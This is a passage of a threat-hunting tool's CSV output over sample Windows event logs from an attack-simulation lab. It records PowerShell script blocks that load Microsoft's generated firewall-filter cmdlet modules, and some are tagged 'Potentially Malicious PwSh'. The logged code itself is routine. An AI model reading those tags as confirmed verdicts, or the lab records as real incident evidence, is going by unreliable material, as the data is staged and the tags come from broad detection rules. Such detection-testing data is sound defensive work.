[CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] 
[OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('LocalIP')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('RemoteIP')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters 
$__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallAddressFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallAddressFilter' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.251 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" 
ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.252 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.253 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallAddressFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.253 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallAddressFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.299 
+09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetApplicationFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallApplicationFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Program}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Package}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, 
[Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Program') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = 
@(${Program}) $__cmdletization_queryBuilder.FilterByProperty('AppPath', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Package') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Package}) $__cmdletization_queryBuilder.FilterByProperty('Package', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByApplication', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallApplicationFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallApplicationFilter' -Alias '*' function Set-NetFirewallApplicationFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] 
[OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Program}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Package}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters 
$__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Program')) { [object]$__cmdletization_value = ${Program} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AppPath'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AppPath'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Package')) { [object]$__cmdletization_value = ${Package} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Package'; 
ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallApplicationFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallApplicationFilter' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.299 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = 
$MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetApplicationFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallApplicationFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Program}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Package}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, 
[Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Program') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Program}) $__cmdletization_queryBuilder.FilterByProperty('AppPath', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Package') -and 
(@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Package}) $__cmdletization_queryBuilder.FilterByProperty('Package', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByApplication', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallApplicationFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallApplicationFilter' -Alias '*' function Set-NetFirewallApplicationFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] param( 
[Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Program}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Package}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process 
{ try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Program')) { [object]$__cmdletization_value = ${Program} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AppPath'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AppPath'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Package')) { [object]$__cmdletization_value = ${Package} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 
